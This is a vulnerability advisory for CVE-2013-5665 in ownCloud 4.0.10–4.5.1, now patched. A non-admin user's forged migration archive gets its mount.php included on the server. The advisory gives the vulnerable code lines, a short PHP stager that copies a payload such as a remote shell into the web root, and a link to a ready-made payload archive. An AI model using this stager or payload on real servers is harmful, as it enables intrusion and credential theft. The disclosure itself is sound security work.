* Title: Inclusion of a user provided PHP file in ownCloud 4.5
* Publish Date: 2019-09-26
* Author: Felix Richter
* Contact:  root@euer.krebsco.de
* CVE-ID: CVE-2013-5665
* Report Version: 2.1
* Report URL: http://pigstarter.krebsco.de/report/2012-11-04_ownedcloud.txt
* State: Patched by Vendor
* Vendor Report: https://owncloud.org/security/advisories/code-execution-lib-migrate-php/
* Vulnerable: OwnCloud 4.0.10 - 4.5.1


# Vulnerability Description
A remote authenticated user without admin rights can run arbitrary code by
importing a forged ownCloud archive zip file. The import archive contains the
file `$username/mount.php` which will be included server-side once after
uploading the archive.

The vulnerability can be triggered despite the app "External storage
support" (apps/files_external) being disabled.

# Vulnerable Scripts:
```
lib/util.php:71:
     $mountConfig = include($user_root.'/mount.php');

apps/files_external/lib/config.php:239 and 234:
     $file = OC_User::getHome(OCP\User::getUser()).'/mount.php';
     ...
     $mountPoints = include($file);
```
# Proof of Concept
The forged archive has the following structure:

    /export_info.json
    /$username/
              /files/
              /migration.db
              /mount.php
              /payload.php

`mount.php` can be used as stager to copy files from the protected "/data/"
directory to the server root directory:

```
<?php
copy("../data/".OCP\USER::getUser()."/payload.php","../payload.php");
?>
```

The payload.php can be a remote shell or sql editor.

A specially crafted adminer which includes the server and database
configuration is included in the archive and is accessible after exploitation at
http:://$webroot/payload.php .

Payload URL: http://pigstarter.krebsco.de/payload/ownedcloud.zip

# Timeline

2012-11-04 - First Contact with OwnCloud Security Team
2012-11-05 - Sent Report
2012-11-12 - Request Status Update
2012-11-20 - Published Report on OwnCloud Website
2019-09-26 - Publish Report on pigstarter.krebsco.de